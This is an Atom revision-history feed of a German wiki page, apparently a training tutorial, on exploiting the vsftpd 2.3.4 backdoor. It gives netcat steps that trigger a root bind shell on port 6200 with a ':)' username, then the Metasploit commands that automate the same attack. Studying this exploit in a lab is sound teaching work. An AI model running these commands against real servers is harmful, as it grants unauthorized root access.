<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="de">
	<id>https://wiki.ixheim.de/index.php?action=history&amp;feed=atom&amp;title=Metasploit_VSFTP_2.3.4</id>
	<title>Metasploit VSFTP 2.3.4 - Versionsgeschichte</title>
	<link rel="self" type="application/atom+xml" href="https://wiki.ixheim.de/index.php?action=history&amp;feed=atom&amp;title=Metasploit_VSFTP_2.3.4"/>
	<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Metasploit_VSFTP_2.3.4&amp;action=history"/>
	<updated>2026-04-09T02:43:18Z</updated>
	<subtitle>Versionsgeschichte dieser Seite in Xinux Wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Metasploit_VSFTP_2.3.4&amp;diff=55520&amp;oldid=prev</id>
		<title>Thomas.will: /* Metasploit benutzen */</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Metasploit_VSFTP_2.3.4&amp;diff=55520&amp;oldid=prev"/>
		<updated>2024-08-15T09:49:51Z</updated>

		<summary type="html">&lt;p&gt;&lt;span dir=&quot;auto&quot;&gt;&lt;span class=&quot;autocomment&quot;&gt;Metasploit benutzen&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;table class=&quot;diff diff-contentalign-left diff-editfont-monospace&quot; data-mw=&quot;interface&quot;&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;tr class=&quot;diff-title&quot; lang=&quot;de&quot;&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;← Nächstältere Version&lt;/td&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;Version vom 15. August 2024, 09:49 Uhr&lt;/td&gt;
				&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot; id=&quot;mw-diff-left-l28&quot; &gt;Zeile 28:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Zeile 28:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;* Metasploit kann diesen Vorgang automatisieren mit dem Exploit/Payload Verfahren&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;* Metasploit kann diesen Vorgang automatisieren mit dem Exploit/Payload Verfahren&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;* '''msfconsole'''&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;* '''msfconsole'''&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;* '''search vsftp'''&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;* '''use exploit/unix/ftp/vsftpd_234_backdoor'''&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;* '''use exploit/unix/ftp/vsftpd_234_backdoor'''&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;* '''set RHOSTS ''IP.des.ftp.servers'' '''&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;* '''set RHOSTS ''IP.des.ftp.servers'' '''&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;</summary>
		<author><name>Thomas.will</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Metasploit_VSFTP_2.3.4&amp;diff=49001&amp;oldid=prev</id>
		<title>Linkai.zhang: /* Metasploit benutzen */</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Metasploit_VSFTP_2.3.4&amp;diff=49001&amp;oldid=prev"/>
		<updated>2023-08-30T11:17:45Z</updated>

		<summary type="html">&lt;p&gt;&lt;span dir=&quot;auto&quot;&gt;&lt;span class=&quot;autocomment&quot;&gt;Metasploit benutzen&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;table class=&quot;diff diff-contentalign-left diff-editfont-monospace&quot; data-mw=&quot;interface&quot;&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;tr class=&quot;diff-title&quot; lang=&quot;de&quot;&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;← Nächstältere Version&lt;/td&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;Version vom 30. August 2023, 11:17 Uhr&lt;/td&gt;
				&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot; id=&quot;mw-diff-left-l28&quot; &gt;Zeile 28:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Zeile 28:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;* Metasploit kann diesen Vorgang automatisieren mit dem Exploit/Payload Verfahren&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;* Metasploit kann diesen Vorgang automatisieren mit dem Exploit/Payload Verfahren&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;* '''msfconsole'''&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;* '''msfconsole'''&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;* '''use exploit/unix/ftp/&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;vsftp_234_backdoor&lt;/del&gt;'''&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;* '''use exploit/unix/ftp/&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;vsftpd_234_backdoor&lt;/ins&gt;'''&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;* '''set RHOSTS ''IP.des.ftp.servers'' '''&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;* '''set RHOSTS ''IP.des.ftp.servers'' '''&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;* '''set RPORT 21 '''&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;* '''set RPORT 21 '''&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;</summary>
		<author><name>Linkai.zhang</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Metasploit_VSFTP_2.3.4&amp;diff=48998&amp;oldid=prev</id>
		<title>Linkai.zhang: Die Seite wurde neu angelegt: „= Schwachstelle =  * In VSFTP Version 2.3.4 wurde eine Backdoor eingebaut, welche root-Zugriff auf den Server erlaubt * Dabei wurde eine Bind-Shell auf TCP Por…“</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Metasploit_VSFTP_2.3.4&amp;diff=48998&amp;oldid=prev"/>
		<updated>2023-08-30T10:46:54Z</updated>

		<summary type="html">&lt;p&gt;Die Seite wurde neu angelegt: „= Schwachstelle =  * In VSFTP Version 2.3.4 wurde eine Backdoor eingebaut, welche root-Zugriff auf den Server erlaubt * Dabei wurde eine Bind-Shell auf TCP Por…“&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Neue Seite&lt;/b&gt;&lt;/p&gt;&lt;div&gt;= Schwachstelle =&lt;br /&gt;
&lt;br /&gt;
* In VSFTP Version 2.3.4 wurde eine Backdoor eingebaut, welche root-Zugriff auf den Server erlaubt&lt;br /&gt;
* Dabei wurde eine Bind-Shell auf TCP Port 6200 geöffnet, wenn man &amp;quot;:)&amp;quot; als Nutzernamen eingibt&lt;br /&gt;
&lt;br /&gt;
= Manuell nachspielen =&lt;br /&gt;
&lt;br /&gt;
* Zwei Terminals vorbereiten&lt;br /&gt;
* Terminal 1 verbindet sich zum FTP-Server, nachdem der Exploit ausgeführt wurde, mit:&lt;br /&gt;
* '''nc ''IP.des.ftp.servers'' 6200'''&lt;br /&gt;
* Terminal 2 löst den Exploit aus&lt;br /&gt;
* '''nc ''IP.des.ftp.servers'' 21'''&lt;br /&gt;
* folgende Zeilen eingeben:&lt;br /&gt;
&lt;br /&gt;
 USER user:)&lt;br /&gt;
 PASS pass&lt;br /&gt;
&lt;br /&gt;
* Wenn diese zwei Zeilen eingegeben wurden, kann man den Befehl auf Terminal 1 abschicken&lt;br /&gt;
* Der Befehl sollte nach dem Ausführen nichts anzeigen, was bedeutet, dass die Verbindung aufgebaut wurde&lt;br /&gt;
* folgedende Tests kann man durchführen, um zu sehen, ob man eine Shell hat:&lt;br /&gt;
* '''ip a'''&lt;br /&gt;
* '''id'''&lt;br /&gt;
* '''pwd'''&lt;br /&gt;
* '''ls'''&lt;br /&gt;
&lt;br /&gt;
= Metasploit benutzen =&lt;br /&gt;
&lt;br /&gt;
* Metasploit kann diesen Vorgang automatisieren mit dem Exploit/Payload Verfahren&lt;br /&gt;
* '''msfconsole'''&lt;br /&gt;
* '''use exploit/unix/ftp/vsftp_234_backdoor'''&lt;br /&gt;
* '''set RHOSTS ''IP.des.ftp.servers'' '''&lt;br /&gt;
* '''set RPORT 21 '''&lt;br /&gt;
* '''set payload cmd/unix/interact'''&lt;br /&gt;
* '''exploit'''&lt;br /&gt;
* Nun sollte man genau wie oben eine sehr minimale Shell haben&lt;/div&gt;</summary>
		<author><name>Linkai.zhang</name></author>
	</entry>
</feed>